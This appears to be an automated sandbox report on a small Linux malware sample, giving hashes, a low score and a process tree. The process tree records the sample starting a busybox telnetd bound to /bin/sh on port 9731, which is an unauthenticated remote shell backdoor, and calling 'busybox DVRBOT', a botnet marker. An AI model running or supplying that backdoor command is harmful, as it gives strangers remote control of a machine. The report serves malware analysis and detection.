Analysis
-
max time kernel
0s -
max time network
132s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240226-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
19/04/2024, 18:34
Behavioral task
behavioral1
Sample
faeb36c6b0c802365ae5a4e178f52ca7_JaffaCakes118
Resource
ubuntu1804-amd64-20240226-en
0 signatures
150 seconds
General
-
Target
faeb36c6b0c802365ae5a4e178f52ca7_JaffaCakes118
-
Size
47KB
-
MD5
faeb36c6b0c802365ae5a4e178f52ca7
-
SHA1
b3381a898e5ebd31508fbc1bbcabbf7887745f2c
-
SHA256
4fe7378e12a87999e00dec42972648e52157f2b40cec9540e2f4044061f43f61
-
SHA512
45878a6c02849dcc7eabaf6d197ad0b0c7ad7e63c9a5d4b4d30dc8673940d608b9fa9400e9318c3e0bad62c71b3bd936c2fb23ba42c31af307c4221104ea4c58
-
SSDEEP
768:b8vJO8sbCX+UzVZ1Yd0qK/N40Si+3vP89JzwXJMGjTWJy6XjArc460z3Qe3yHX5R:AvJO8s2uU5PYdNsa0q3vEsXJMGPl6TA4
Score
1/10
Malware Config
Signatures
Processes
-
/tmp/faeb36c6b0c802365ae5a4e178f52ca7_JaffaCakes118/tmp/faeb36c6b0c802365ae5a4e178f52ca7_JaffaCakes1181⤵PID:1517
-
/bin/shsh -c "/bin/busybox telnetd -p 9731 -l /bin/sh"2⤵PID:1518
-
/bin/busybox/bin/busybox telnetd -p 9731 -l /bin/sh3⤵PID:1519
-
-
-
/bin/shsh -c "/bin/busybox DVRBOT"2⤵PID:1521
-
/bin/busybox/bin/busybox DVRBOT3⤵PID:1522
-
-